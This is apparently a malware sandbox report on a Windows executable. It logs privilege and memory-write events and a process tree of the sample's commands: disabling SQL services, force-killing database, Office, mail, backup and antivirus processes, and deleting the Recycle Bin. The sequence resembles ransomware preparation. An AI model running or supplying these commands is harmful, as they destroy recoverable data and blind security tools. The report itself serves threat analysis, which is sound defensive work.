N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1028 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 1028 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 1028 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 1028 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 1028 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 1028 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 1028 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 1028 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\sc.exe
PID 1028 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4216 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\cmd.exe
PID 1028 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\cmd.exe
PID 1028 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 2412 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1520 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1944 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe
PID 1028 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe C:\Windows\SYSTEM32\taskkill.exe

Processes

C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

"C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SQLWriter start= disabled

C:\Windows\SYSTEM32\sc.exe

"sc.exe" config SstpSvc start= disabled

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopqos.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mydesktopservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mysqld.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqbcoreservice.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM firefoxconfig.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM agntsvc.exe /F

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM thebat.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM steam.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM encsvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM excel.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM CNTAoSMgr.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM sqlwriter.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM tbirdconfig.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM dbeng50.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM thebat64.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM ocomm.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM infopath.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mbamtray.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM zoolz.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" IM thunderbird.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM dbsnmp.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM xfssvccon.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM mspub.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM Ntrtscan.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM isqlplussvc.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM onenote.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM PccNTMon.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM msaccess.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM outlook.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM tmlisten.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM msftesql.exe /F

C:\Windows\SYSTEM32\taskkill.exe

"taskkill.exe" /IM powerpnt.exe /F

